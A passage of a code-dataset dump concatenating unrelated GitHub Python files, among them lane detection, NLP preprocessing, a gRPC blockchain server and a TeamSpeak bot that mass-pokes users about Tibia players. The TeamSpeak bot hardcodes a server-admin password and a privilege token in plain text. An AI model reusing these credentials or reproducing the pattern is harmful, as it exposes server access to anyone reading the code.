',dA)\r\n# # if pixelPerMetricX ==0 or pixelPerMetricY ==0:\r\n# # pixelPerMetricX = dB/width\r\n# # pixelPerMetricY = dA/width\r\n# # dimA=dA/pixelPerMetricY\r\n# # dimB=dB/pixelPerMetricX\r\n# mylist = [tltrY,blbrY,tlblY,trbrY]\r\n# # print(max(mylist))\r\n# if max(mylist)==trbrY:\r\n# cv2.circle(orig,(int(trbrX),int(trbrY)),5,(255,0,0),-1)\r\n# elif max(mylist)==tltrY:\r\n# cv2.circle(orig,(int(tltrX),int(tltrY)),5,(255,0,0),-1)\r\n# elif max(mylist)==tlblY:\r\n# cv2.circle(orig,(int(tlblX),int(tlblY)),5,(255,0,0),-1)\r\n# else :\r\n# cv2.circle(orig,(int(blbrY),int(blbrY)),5,(255,0,0),-1)\r\n\r\n\r\n\r\n# x=int((tltrX+tlblX+blbrX+trbrX)/4)\r\n# y=int((tltrY+tlblY+blbrY+trbrY)/4)\r\n\r\n# ##############dash or solid#####################\r\n# # if dB >500:\r\n# # cv2.putText(orig,'solid',(x,y), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2, cv2.LINE_AA)\r\n# # else:\r\n# # cv2.putText(orig,'dash',(x,y), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 2, cv2.LINE_AA)\r\n \r\n# # cv2.putText(orig,\"{:.1f}nm\".format(dimB),(int(tltrX)-10,int(tltrY)),cv2.FONT_HERSHEY_COMPLEX,0.1,(255,0,0),1)\r\n# # cv2.putText(orig,\"{:.1f}nm\".format(dimA),(int(trbrX)-10,int(trbrY)),cv2.FONT_HERSHEY_COMPLEX,0.1,(255,255,255),1)\r\n\r\n# # cv2.imwrite('1.jpg'.format(order),orig)\r\n# # cv2.imshow('frame',orig)\r\n# # cv2.waitKey(0)\r\n# # print(orig)\r\n# img1=orig\r\n# order += 1\r\n# # print(c)\r\n# # cv2.imshow('frame',orig)\r\n# # print('111111111111111111',img.shape,orig.shape)\r\n# print(int(img.shape[0]*3/5),int(img.shape[0]*4/5) , 0,int(img.shape[1]))\r\n# cv2.imshow('frame',orig)\r\n# cv2.waitKey(0)\r\n# img[int(img.shape[0]*3/5) : int(img.shape[0]*4/5) , 0 : int(img.shape[1])] = orig[int(img.shape[0]*3/5) : int(img.shape[0]*4/5) , 0 : int(img.shape[1])]\r\n# cv2.imshow('frame',orig)\r\n# cv2.waitKey(0)\r\n# cv2.imwrite('1.jpg',img)\r\n# cv2.imshow('frame',img)\r\n# cv2.waitKey(0)\r\n","repo_name":"q36101/lane_detection","sub_path":"solidlane_and_dashlane_test/other/lane_type_fps.py","file_name":"lane_type_fps.py","file_ext":"py","file_size_in_byte":11134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71186026982","text":"import numpy as np\n\n\ndef cost_function_regression(targets, predictions):\n return np.mean(np.square(np.subtract(targets, predictions)))\n\n\ndef cost_function_classification(targets, predictions):\n return np.mean(-targets * np.log(predictions))\n\n\nif __name__ == '__main__':\n targets = np.array([1, 2, 3])\n predictions = np.array([0, 1, 8])\n\n print('targets =', targets)\n print('predictions =', predictions)\n\n print('Regression cost = ', cost_function_regression(targets, predictions))\n\n CLASSES = {\n 0: 'cat',\n 1: 'dog'\n }\n\n targets = np.array([0, 1, 1]) # cat, dog, dog\n good_predictions = np.array([0.1, 0.9, 0.9]) # predicted probability distribution\n bad_predictions = np.array([0.9, 0.1, 0.2]) # predicted probability distribution\n\n print('targets =', targets)\n print('good predictions =', good_predictions)\n print('bad predictions =', good_predictions)\n\n print('Classification cost (good) = ', cost_function_classification(targets, good_predictions))\n print('Classification cost (bad) = ', cost_function_classification(targets, bad_predictions))\n","repo_name":"PacktPublishing/Advanced-Deep-Learning-with-Keras-V","sub_path":"Code/s1/1.2/2_cost_function.py","file_name":"2_cost_function.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"35"} +{"seq_id":"37700695085","text":"import requests\nimport sys\n\nURL = \"https://pokeapi.co/api/v2/pokemon/{pokemon_name}\"\n\nif __name__ == \"__main__\":\n pokename = input(\"Enter the name of a Pokemon: \").lower()\n try:\n response = requests.get(URL.format(pokemon_name=pokename))\n if response.status_code != 200:\n print(\"Sorry, I couldn't find that Pokemon.\")\n sys.exit(1)\n data = response.json()\n print(\"Name: {}\".format(data[\"name\"].title()))\n print(\"Abilities:\")\n for ability in data[\"abilities\"]:\n print(\"- {}\".format(ability[\"ability\"][\"name\"].title()))\n except requests.exceptions.RequestException as e:\n print(\"Request failed!\")\n","repo_name":"faruktinaz/42-event-april","sub_path":"ex11/find.py","file_name":"find.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"20397358772","text":"\"\"\"Module containing trainer logic\"\"\"\nfrom dataclasses import dataclass\n\nfrom pytorch_lightning.utilities import xla_device\nfrom pytorch_lightning.loggers import WandbLogger\nfrom torch import cuda\nimport pytorch_lightning as pl\n\nfrom callbacks import get_checkpoint, Freezer, ProgressBar\nfrom model import PretrainedModel\nfrom utils import CustomParser as ArgumentParser\n\n@dataclass\nclass Trainer():\n fast_dev_run = False\n gradient_clip = 0.0\n model_name: str\n precision = 16\n stages = 2\n train_bn = False\n unfreeze_per_step = 21\n\n def get_callbacks(self, model_name: str, epochs: int) -> list:\n checkpoint = get_checkpoint(model_name)\n freezer = Freezer(\n epochs,\n self.stages,\n self.unfreeze_per_step,\n self.train_bn\n )\n return [checkpoint, freezer, ProgressBar()]\n\n @staticmethod\n def get_accelerator() -> object:\n tpu_device_exists = xla_device.XLADeviceUtils().tpu_device_exists()\n has_gpu = cuda.is_available()\n\n return {'tpu_cores': 1} if tpu_device_exists else \\\n {'gpus': cuda.device_count()} if has_gpu else {}\n\n def create_trainer(self, model_name, max_epochs=1, **kwargs):\n accelerator = self.get_accelerator()\n callbacks = self.get_callbacks(model_name, max_epochs)\n logger = WandbLogger()\n return pl.Trainer(\n max_epochs=max_epochs, deterministic=True, callbacks=callbacks,\n precision=self.precision, stochastic_weight_avg=False, logger=logger,\n gradient_clip_val=self.gradient_clip, **accelerator, **kwargs)\n\n def _create_trainer(self, max_epochs: int) -> pl.Trainer:\n return self.create_trainer(\n self.model_name, max_epochs, fast_dev_run=self.fast_dev_run)\n\n def _fit_cycle(self, model: PretrainedModel, epochs: int, datamodule):\n trainer = self._create_trainer(epochs)\n trainer.fit(model, datamodule=datamodule)\n return trainer\n\n def train_and_test(self, model: PretrainedModel, epochs: int, datamodule):\n last_trainer = self._fit_cycle(model, epochs, datamodule)\n last_trainer.test(datamodule=datamodule)\n\n def test(self, model: PretrainedModel, datamodule):\n trainer = self.create_trainer(model.hparams.model_name)\n trainer.test(model=model, datamodule=datamodule)\n\n @staticmethod\n def add_argparse_args(parent_parser):\n parser = ArgumentParser(parents=[parent_parser], add_help=False)\n parser.add_argument('--fast_dev_run', action='store_true')\n parser.add_argument('--precision', type=int, choices=[16, 32], default=16)\n parser.add_argument('--stages', type=int, default=2)\n parser.add_bool_argument('--train_bn')\n parser.add_argument('--unfreeze_per_step', type=int, default=21)\n parser.add_argument('--gradient_clip', type=float, default=0.0)\n return parser\n\n @staticmethod\n def from_argparse_args(args):\n trainer = Trainer(args.model_name)\n trainer.fast_dev_run = args.fast_dev_run\n trainer.precision = args.precision\n trainer.stages = args.stages\n trainer.train_bn = args.train_bn\n trainer.unfreeze_per_step = args.unfreeze_per_step\n trainer.gradient_clip = args.gradient_clip\n return trainer\n","repo_name":"ricglz/CE888_activities","sub_path":"assignment/scripts/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":3327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74426816101","text":"import nltk\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.tokenize import word_tokenize\r\nfrom nltk.stem import WordNetLemmatizer, PorterStemmer\r\nimport string\r\n\r\nnltk.download('stopwords')\r\nnltk.download('punkt')\r\nnltk.download('wordnet')\r\n\r\nwith open('input_text.txt', 'r', encoding='utf-8') as file:\r\n text = file.read()\r\n\r\n#Токенізація по словам\r\nwords = word_tokenize(text)\r\n\r\n#Лематизація та стеммінг\r\nlemmatizer = WordNetLemmatizer()\r\nstemmer = PorterStemmer()\r\nlemmatized_words = [lemmatizer.lemmatize(word) for word in words]\r\nstemmed_words = [stemmer.stem(word) for word in words]\r\n\r\n#Видалення стоп-слів\r\nstop_words = set(stopwords.words('english'))\r\nfiltered_words = [word for word in lemmatized_words if word.lower() not in stop_words]\r\n\r\n#Видалення пунктуації\r\nfiltered_words = [word for word in filtered_words if word not in string.punctuation]\r\n\r\nprocessed_text = ' '.join(filtered_words)\r\nwith open('processed_text.txt', 'w', encoding='utf-8') as file:\r\n file.write(processed_text)\r\n","repo_name":"lichueva/puthon","sub_path":"Обробка природної мови з використанням Python бібліотек/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"24503377460","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nCutword for sentiment dataset\n\ninput format:\n id sentitype text\n\nUsage:\n cut -t [pos] -c [hidden] -f \n -t ; save pos tag\n -c ; output , otherwise output by default\n -f ; input file name\n\n\"\"\"\n\nimport string\nimport sys,time\nimport os, os.path\nimport logging\nimport jieba\nfrom jieba.norm import norm_cut, norm_seg\nfrom optparse import OptionParser\n\ndef cut_test():\n '''\n cut from std input\n '''\n logger.info('Enter test mode, q to quit')\n line = raw_input()\n while(line != 'q'):\n result = norm_seg(line.strip())\n wordsList = []\n for w in result:\n wordsList.append(w.word + '/' + w.flag)\n words = \" \".join(wordsList)\n print(words.encode('utf-8'))\n\n line = raw_input()\n\ndef cut_input(input, posFlag):\n '''\n cut a input string, return utf-8 string\n '''\n\n if posFlag == True:\n result = norm_seg(input)\n wordsList = []\n for w in result:\n wordsList.append(w.word + '_' + w.flag)\n words = \" \".join(wordsList)\n else:\n words = \" \".join(norm_cut(input))\n #return words.encode('utf-8')\n return words\n \n\ndef cut_file(fileName, posFlag, column):\n '''\n cut from file and output to filename.cut\n '''\n dir, name = os.path.splitext(fileName)\n prefix = 's' if column ==0 else 'h'\n writer = open( prefix + dir + '.cut', 'w')\n reader = open(fileName, 'rb')\n \n reccnt = 0\n #\n # parse the records\n # id label hidden text\n #\n for line in reader:\n #add a id \n if line[0] == ' ':\n pos0 = line.find(' ')+1\n else:\n pos0 = 0\n pos1 = line.find(' ',pos0)+1\n pos2 = line.find(' ',pos1)+1\n\n if pos2 > 0:\n label = int(float(line[pos0:pos1-1]))\n stype = int(float(line[pos1:pos2-1]))\n content = line[pos2:-1]\n\n #result = \" %d\"%reccnt + cut_input(content, posFlag)\n result = cut_input(content, posFlag)\n if column == 0:\n #writer.write('%d %d '%(stype,label) + result.encode('utf-8') + '\\n')\n writer.write('%d %d '%(label, stype) + result.encode('utf-8') + '\\n')\n else:\n writer.write('%d %d '%(int(float(hidden)), label) + result.encode('utf-8') + '\\n')\n\n reccnt += 1\n\n reader.close()\n writer.close()\n\n\nif __name__==\"__main__\":\n program = os.path.basename(sys.argv[0])\n logger = logging.getLogger(program)\n\n # logging configure\n import logging.config\n logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s')\n logging.root.setLevel(level=logging.DEBUG)\n logger.info(\"running %s\" % ' '.join(sys.argv))\n\n # cmd argument parser\n usage = 'cut -t [pos] -c [hidden] -f '\n parser = OptionParser(usage)\n parser.add_option(\"-f\", dest=\"pathName\")\n parser.add_option(\"-t\", dest=\"type\")\n parser.add_option(\"-c\", dest=\"column\")\n parser.add_option(\"--userdict\", dest=\"userdict\", default='')\n opt, args = parser.parse_args()\n\n #load user dict\n if opt.userdict:\n logger.info('loading userdict %s...', opt.userdict)\n jieba.load_userdict(opt.userdict)\n\n\n if opt.pathName is None:\n logger.error(globals()['__doc__'] % locals())\n\n #enter test mode\n cut_test()\n\n sys.exit(1)\n\n posFlag = False\n column = 0 #'senti'\n if not (opt.type is None):\n posFlag = True\n if not (opt.column is None):\n column = 1 #'hidden'\n\n #cut\n arg_name = opt.pathName \n if os.path.isdir(arg_name):\n for root, dirs, files in os.walk(arg_name):\n #print root, dirs, files\n for file_name in files:\n cut_file( root + '/' + file_name, posFlag, column)\n break \n else:\n cut_file( arg_name, posFlag, column)\n","repo_name":"spikems/semeval","sub_path":"src/semeval/labelprocess/cut.py","file_name":"cut.py","file_ext":"py","file_size_in_byte":3947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"17735800258","text":"# gRPC\nfrom concurrent.futures import ThreadPoolExecutor\nfrom grpc import server as grpc_server\n\n# Threading\nfrom threading import Thread, Event\n\n# Add to path\nfrom sys import path\nfrom os.path import dirname, abspath, join\n\npath.insert(0, join(dirname(abspath(__file__))))\n\n# Blockchain protobuf\nfrom blockchain_pb2 import Transaction as RPCTransaction, Block as RPCBlock, Transactions, Blocks, BaseFee, Success\nfrom blockchain_pb2_grpc import BlockchainServicer, add_BlockchainServicer_to_server as add_blockchain\n\n# Wallet protobuf\nfrom wallet_pb2 import WalletResponse\nfrom wallet_pb2_grpc import WalletServicer, add_WalletServicer_to_server as add_wallet\n\n# Dev log\nfrom time import sleep\n\n# Add to path\nfrom sys import path\nfrom os.path import dirname, abspath, join\n\npath.insert(0, join(dirname(abspath(__file__)), '..'))\n\n# Project version\nfrom __init__ import RPC_PORT\n\n# Project modules\nfrom accounts import Wallet\nfrom blockchain.transaction import Transaction\nfrom blockchain.block import Block\nfrom blockchain.blockchain import Blockchain\n\nfrom util.database.blockchain import fetch_block, fetch_block_from_timestamp, fetch_block_from_signature\n\n\nclass BlockchainListener(BlockchainServicer):\n def __init__(self, blockchain, db_q=None):\n \"\"\"Initialize the required values.\n\n :param blockchain: Chain to fetch from\n :type blockchain: :py:class:`blockchain.Blockchain`\n \"\"\"\n self.blockchain = blockchain\n\n self.db_q = db_q\n\n def getBlock(self, request, context):\n \"\"\"Fetch block from the given values.\n\n :param request: Information about the request.\n :param context: Context of the request.\n\n :return: Block protocol-message.\n :rtype: :py:object:`blockchain_pb2.Block`\n \"\"\"\n\n if request.index:\n block_dict = fetch_block(request.index)\n\n elif request.timestamp:\n block_dict = fetch_block_from_timestamp(request.timestamp)\n\n elif request.hash and request.signature:\n block_dict = fetch_block_from_signature(request.signature, request.hash)\n\n else:\n block_dict = None\n\n # Check if fetch was successful\n if not block_dict:\n return RPCBlock(index=0, previousHash='', version='', timestamp='',\n baseFee=0, tx=[], hash='', signature='')\n\n tx = []\n\n for transaction in block_dict['tx']:\n tx.append(RPCTransaction(sender=transaction['sender'], recipient=transaction['recipient'],\n amount=transaction['amount'], fee=transaction['fee'], type=transaction['tx_type'],\n timestamp=transaction['timestamp'], hash=transaction['hash'],\n signature=transaction['signature']))\n\n return RPCBlock(index=block_dict['index'], previousHash=block_dict['previous_hash'],\n version=block_dict['version'], timestamp=str(block_dict['timestamp']),\n baseFee=block_dict['base_fee'], tx=tx, hash=block_dict['hash'],\n signature=block_dict['signature'])\n\n def getBlocks(self, request, context):\n \"\"\"Fetch blocks from the given values.\n\n :param request: Information about the request.\n :param context: Context of the request.\n\n :return: Blocks protocol-message.\n :rtype: :py:object:`blockchain_pb2.Blocks`\n \"\"\"\n\n # TODO -> Fetch the blocks that were requested\n\n blocks = []\n\n for req_block in request:\n if req_block.index:\n block_dict = fetch_block(req_block.index)\n\n elif req_block.timestamp:\n block_dict = fetch_block_from_timestamp(req_block.timestamp)\n\n elif req_block.hash and req_block.signature:\n block_dict = fetch_block_from_signature(req_block.signature, req_block.hash)\n\n # Check if fetch was successful\n if not block_dict:\n blocks.append(RPCBlock(index=0, previousHash='', version='', timestamp='',\n baseFee=0, tx=[], hash='', signature=''))\n\n tx = []\n\n for transaction in block_dict['tx']:\n tx.append(RPCTransaction(sender=transaction['sender'], recipient=transaction['recipient'],\n amount=transaction['amount'], fee=transaction['fee'],\n type=transaction['tx_type'],\n timestamp=transaction['timestamp'], hash=transaction['hash'],\n signature=transaction['signature']))\n\n blocks.append(RPCBlock(index=block_dict['index'], previousHash=block_dict['previous_hash'],\n version=block_dict['version'], timestamp=str(block_dict['timestamp']),\n baseFee=block_dict['base_fee'], tx=tx, hash=block_dict['hash'],\n signature=block_dict['signature']))\n\n return Blocks(blocks=blocks)\n\n def getTransaction(self, request, context):\n \"\"\"Fetch transaction from the given values.\n\n :param request: Information about the request.\n :param context: Context of the request.\n\n :return: Transaction protocol-message.\n :rtype: :py:object:`blockchain_pb2.Transaction`\n \"\"\"\n\n # TODO -> Fetch transaction that was requested\n\n return Transaction(sender='sdf', recipient='sdwf', amount=12, fee=23, type='tx', timestamp='1234',\n hash='123231wef', signature='asdf')\n\n def getTransactions(self, request, context):\n \"\"\"Fetch transactions from the given values.\n\n :param request: Information about the request.\n :param context: Context of the request.\n\n :return: Transactions protocol-message.\n :rtype: :py:object:`blockchain_pb2.Transactions`\n \"\"\"\n\n # TODO -> Fetch transactions that were requested\n\n return Transactions(tx=[Transaction(sender='sdf', recipient='sdwf', amount=12, fee=23, type='tx',\n timestamp='1234', hash='123231wef', signature='asdf'),\n Transaction(sender='sdf', recipient='sdwf',\n amount=12, fee=23, type='tx', timestamp='1234', hash='123231wef',\n signature='asdf')])\n\n def addTransaction(self, request, context):\n # Recreate the transaction\n tx = Transaction('', '', 0)\n tx.from_dict({\n 'sender': request.sender,\n 'recipient': request.recipient,\n\n 'amount': request.amount,\n 'fee': request.fee,\n\n 'type': request.type,\n 'timestamp': request.timestamp,\n\n 'hash': request.hash,\n 'signature': request.signature\n })\n\n # Put it to the processor-queue\n input_queue.put({'type': 'tx', 'data': tx})\n\n return Success(success=True)\n\n def addTransactions(self, request, context):\n # Go through all provided transactions\n for transaction in request.transactions:\n # Recreate the transaction\n tx = Transaction('', '', 0)\n tx.from_dict({\n 'sender': transaction.sender,\n 'recipient': transaction.recipient,\n\n 'amount': transaction.amount,\n 'fee': transaction.fee,\n\n 'type': transaction.type,\n 'timestamp': transaction.timestamp,\n\n 'hash': transaction.hash,\n 'signature': transaction.signature\n })\n\n # Put it to the processor-queue\n input_queue.put({'type': 'tx', 'data': tx})\n\n return Success(success=True)\n\n def getBaseFee(self, request, context):\n return BaseFee(base_fee=self.blockchain.last_blocks[0].base_fee)\n\n\nclass WalletListener(WalletServicer):\n def __init__(self, blockchain, db_q=None):\n \"\"\"Initialize the required values.\n\n :param blockchain: Chain to fetch from\n :type blockchain: :py:class:`blockchain.Blockchain`\n \"\"\"\n self.blockchain = blockchain\n\n self.db_q = db_q\n\n def getCoins(self, request, context):\n coins = Wallet.coins(request.public_key, self.blockchain)\n\n # Check if coins were fetched correctly\n if not coins:\n return WalletResponse(amount=-1)\n\n return WalletResponse(amount=coins)\n\n def getStake(self, request, context):\n stake = Wallet.stake(request.public_key, self.blockchain)\n\n # Check if coins were fetched correctly\n if not stake:\n return WalletResponse(amount=-1)\n\n return WalletResponse(amount=stake)\n\n def getScore(self, request, context):\n score = Wallet.score(request.public_key, self.blockchain)\n\n # Check if coins were fetched correctly\n if not score:\n return WalletResponse(amount=-1)\n\n return WalletResponse(amount=score)\n\n def getClaims(self, request, context):\n claims = Wallet.claims(request.public_key, self.blockchain)\n\n # Check if coins were fetched correctly\n if not claims:\n return WalletResponse(amount=-1)\n\n return WalletResponse(amount=claims)\n\n\nclass RPCServer():\n def __init__(self, blockchain, processor_queue, port=None, start=False, db_q=None):\n \"\"\"Initialize the server-values.\n\n :param blockchain: Chain to fetch from\n :type blockchain: :py:class:`blockchain.Blockchain`\n :param port: Port to listen on.\n :type port: int\n :param start: Start automatically or not\n :type start: bool\n \"\"\"\n self.port = port if port else RPC_PORT\n self.blockchain = blockchain\n\n global input_queue\n input_queue = processor_queue\n\n self.server = None\n\n self.db_q = db_q\n\n if start:\n self.start()\n\n def start(self):\n \"\"\"Starts the rpc server.\n\n :return: Status if server start was successful.\n :rtype: bool\n \"\"\"\n if self.server:\n return False\n\n self.server = grpc_server(ThreadPoolExecutor(max_workers=1))\n\n add_blockchain(BlockchainListener(self.blockchain, db_q=self.db_q), self.server)\n add_wallet(WalletListener(self.blockchain, db_q=self.db_q), self.server)\n\n self.server.add_insecure_port(f'[::]:{self.port}')\n self.server.start()\n\n return True\n\n def stop(self):\n \"\"\"Stops the rpc server.\n\n :return: Status if stop was successful.\n :rtype: bool\n \"\"\"\n if not self.server:\n return False\n\n self.server.stop(0)\n self.server = None\n\n return True\n\n def restart(self):\n \"\"\"Restarts the rpc server.\n\n :return: Status if restart was successful.\n :rtype: bool\n \"\"\"\n success = self.stop()\n\n if not success:\n return False\n\n self.start()\n\n if not success:\n return False\n\n return True\n","repo_name":"advaced/advaced","sub_path":"rpc/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":11176,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"5649678679","text":"from ts3 import TS3Server\nfrom time import sleep\nimport time\nimport tibia\n\n\n# ----------------------- CONFIGURAÇÃO ---------------------------------\n\n#lista teste de players para checar novas mortes, ['nome+do+jogador', 'ultimamorte] (criar banco de dados)\nplayerlist = [['Deku Panzon', ''], ['Mouzsack', '2017-10-21 01:20:58.000000'], ['Binus+Belis', '2017-10-21 00:40:01.000000'], ['Old Bodybuilder', ''],\n ['Biger', '2017-10-21 00:37:20.000000'], ['Brisadus', ''], ['Edio Lavis', ''], ['Jazir', ''], ['Floki Svein', ''],\n ['Kolerah', ''], ['Zikiz Surf', ''], ['Garrero Tank', ''], ['Lady Lufty', ''], ['Adethor ade', ''], ['Leozin Aguerrido', ''],\n ['Shaymin Prasete', ''], ['Hintz Mixall', ''], ['Pedrox da Ricaria', ''], ['Angoro', ''], ['Dgzin Feat', ''], ['Wix da Ricaria', ''],\n ['Arroto de bolovo', ''], ['Wesilei+On+Honbra', ''], ['Ohnivek', ''], ['Mage+Brisa', '']]\n\n#lista de makers mage\nmaker_list = ['roque healer', 'king feliipe', 'wizard solo', 'soster mito', 'brax pierce', 'combatente de satan', 'miguel felomenal', 'foxx boladao', 'mexxtre dos magos']\n\ntoken = 'wdskUKgDKf1bxXUjApjgqBc2wiJiEb1+bLSd6y+a' #token de privilegio ADM\nt_makerCheck = 1200 #tempo para cada masspoke de makers online, em segundos\nt_connection = 300 #tempo para reconectar ao servidor ts3\nmakerCheck = time.time() #varivel usada para contar o tempo entre masspoke de makers\npreviousOnline = 0 #usado para guardar ultima qualidade de makers online\nc_renew_time = time.time() #usado para contar tempo usado para renovar conexão com o ts3\n\n# ---------------- FIM DA CONFIGURAÇÂO ---------------------------------\n\nserver = TS3Server('127.0.0.1', 10011, 1)\nif server.login('serveradmin', 'pKEZF0Ct'):\n print('Server connection initilized...')\n\nclients = server.clientlist()\n\ndef massPoke(msg, client):\n for i in clients:\n server.clientpoke(client.get(i)['clid'], msg)\n\n\nwhile True:\n \n makers = tibia.checkOnlineMakers(maker_list)\n\n#renova a conexão com o ts3 a cada 5 minutos...\n if (time.time() - c_renew_time) > t_connection:\n server = TS3Server('127.0.0.1', 10011, 1)\n if server.login('serveradmin', 'pKEZF0Ct'):\n clients = server.clientlist()\n c_renew_time = time.time()\n print('Server connection stable...')\n\n#Verifica makers online, apenas atualiza a cada 5 minutos, excento quanto o algum outro maker entra no jogo.\n#exemplo, ultimo poke aconteceu a 2 minutos com 5 makers, proximo poke so verificaria em 5 minutos, porem se entrou mais 1 player\n#o poke será feito para 6 makers (configuravel, pode-se adicionar incrementos maiores)\n#como elif (makers > (previousOnline+2) ) para apenas avisar quando entrar +3 makers, baseado no numero que havia online antes.\n since = time.time() - makerCheck\n if (makers > 3) and (since > t_makerCheck):\n makerCheck = time.time()\n massPoke(\"[color=red][b]{0} MAKERS ONLINE[/b][/color]\".format(makers), clients)\n previousOnline = makers\n elif (makers > previousOnline):\n massPoke(\"[color=red][b]{0} MAKERS ONLINE[/b][/color]\".format(makers), clients)\n previousOnline = makers\n\n\n#Esse bloco constantemente verifica os players definidos em uma lista ou banco de dados.\n#constando aqui todas as suas mortes, e realizando um massPoke()\n#pode ser adicionado filtros, para evitar pokes de inimigos que morrem para monstros de arena pvp. (Pit Reaver, Pit Blackling, Death, etc)\n\n for k, i in enumerate(playerlist):\n lastDeath = tibia.checkLastDeath(i[0])\n if tibia.checkNewDeath(i) and int(lastDeath['level']) > 5:\n print(\"ENEMY MORTO: {0} {1} at level {2}\".format(i[0].replace(\"+\", \" \"), lastDeath['reason'], lastDeath['level']))\n clients = server.clientlist()\n massPoke(\"[color=red]ENEMY MORTO: {0} at level {1}[/color]\".format(i[0].replace(\"+\", \" \"), lastDeath['level']), clients)\n playerlist[k][1] = lastDeath['date']['date']","repo_name":"DevonWC/ts3-bot","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"21598734413","text":"import flask\nimport bernie\n\napp = flask.Flask(__name__, static_url_path='/static/')\n\nMODEL_FILENAME = 'models/bern.iter999.h5'\nTEXT_FILENAME = 'bernie_corpus.txt'\n\nimport train_bernie\ntext = train_bernie.read_text_from_file(TEXT_FILENAME)\nchar_indices, indices_char = bernie.make_char_lookup_table(text)\nmodel = bernie.load_model(char_indices)\n\n\"\"\"\n@app.route('/visualization')\ndef visualization():\n weights = open('/tmp/visualization.png').read()\n return flask.Response(weights, mimetype='image/png')\n\"\"\"\n\n@app.route('/ask_question')\ndef ask_question():\n question = flask.request.args.get('question') + '. '\n print('Received question: {}'.format(question))\n answer = bernie.ask_bernie(model, question, char_indices, indices_char)\n print('Returning answer: {}'.format(answer))\n return answer\n\n@app.route('/')\ndef route_index():\n return app.send_static_file('bernie.html')\n\n@app.route('/')\ndef send_static_file(path):\n return flask.send_from_directory('static', path)\n\nif __name__ == '__main__':\n app.run('0.0.0.0', port=8000, use_reloader=False)\n","repo_name":"manceps/tfw","sub_path":"examples/berniebot/webapi.py","file_name":"webapi.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"29579996568","text":"import ast\nimport inspect\nimport pathlib\nimport warnings\nfrom contextlib import suppress\nfrom types import FrameType as Frame\nfrom typing import Any, Callable, Dict, List, Optional, TypeVar, Union\n\nfrom _pointers import force_update_locals\n\nfrom .base_pointers import BasePointer\nfrom .exceptions import NullPointerError, VariableLifetimeError\nfrom .util import NULL, Nullable, handle\n\nT = TypeVar(\"T\")\n\nif hasattr(ast, \"NamedExpr\"):\n NamedExpr = ast.NamedExpr # type: ignore\nelse:\n\n class NamedExpr: # type: ignore\n ...\n\n\ndef _remove_indent(source: str) -> str:\n result: List[str] = []\n split = source.split(\"\\n\")\n\n if (not split[0].startswith(\" \")) and (not split[0].startswith(\"\\t\")):\n return source\n\n last_indent_size: Optional[int] = None\n\n for line in split:\n if (not line.startswith(\" \")) and (not line.startswith(\"\\t\")):\n break\n\n index = 0\n\n for i in line:\n if i not in {\" \", \"\\t\"}:\n break\n index += 1\n\n if (index != last_indent_size) and last_indent_size:\n result.append(line[last_indent_size:])\n else:\n result.append(line[index:])\n last_indent_size = index\n\n return \"\\n\".join(result)\n\n\nclass VarPointer(BasePointer[T]):\n def __init__(self, name: str, frame: Frame) -> None:\n self.name: Optional[str] = name\n self._frame = frame\n self._address = id(~self)\n\n def _get_scope(self) -> Dict[str, Any]:\n if not self.name:\n raise NullPointerError(\"pointer is NULL\")\n\n frame = self._frame\n\n if self.name in frame.f_globals:\n return frame.f_globals\n\n if self.name in frame.f_locals:\n return frame.f_locals\n\n raise VariableLifetimeError(f'variable \"{self.name}\" no longer exists')\n\n @handle\n def move(\n self,\n target: Union[T, \"BasePointer[T]\"],\n *,\n unsafe: bool = False,\n ) -> None:\n if unsafe:\n warnings.warn(\"unsafe has no effect on variable pointers\")\n\n if not self.name:\n raise NullPointerError(\"pointer is NULL\")\n\n scope = self._get_scope()\n\n if (scope is self._frame.f_locals) and (\n self._frame.f_locals is not self._frame.f_globals\n ):\n force_update_locals(\n self._frame,\n self.name,\n (\n ~target\n if isinstance(\n target,\n BasePointer,\n )\n else target\n ),\n )\n else:\n scope[self.name] = (\n ~target\n if isinstance(\n target,\n BasePointer,\n )\n else target\n )\n\n @property\n def address(self) -> Optional[int]:\n return self._address\n\n def _cleanup(self) -> None:\n pass\n\n def __repr__(self) -> str:\n return f\"VarPointer(name={self.name!r})\"\n\n def dereference(self) -> T:\n if not self.name:\n raise NullPointerError(\"pointer is NULL\")\n\n return self._get_scope()[self.name]\n\n def assign(self, value: Nullable[Union[\"VarPointer[T]\", T]]) -> None:\n if value is NULL:\n self._address = 0\n self.name = None\n return\n\n frame = inspect.currentframe()\n assert frame\n assert frame.f_back\n\n if frame.f_back.f_globals == frame.f_globals:\n # it was called by __irshift__\n back = frame.f_back.f_back\n assert back\n txt = pathlib.Path(back.f_code.co_filename).read_text()\n expr = _remove_indent(\n \"\\n\".join(txt.split(\"\\n\")[back.f_lineno - 1:]),\n )\n caller_scope = {**back.f_globals, **back.f_locals}\n augassign: Optional[ast.AugAssign] = None\n\n for node in ast.parse(expr).body:\n if (\n isinstance(node, ast.AugAssign)\n and isinstance(node.op, ast.RShift)\n and isinstance(node.target, ast.Name)\n ):\n with suppress(KeyError):\n if caller_scope[node.target.id] is self:\n augassign = node\n break\n\n if not augassign:\n 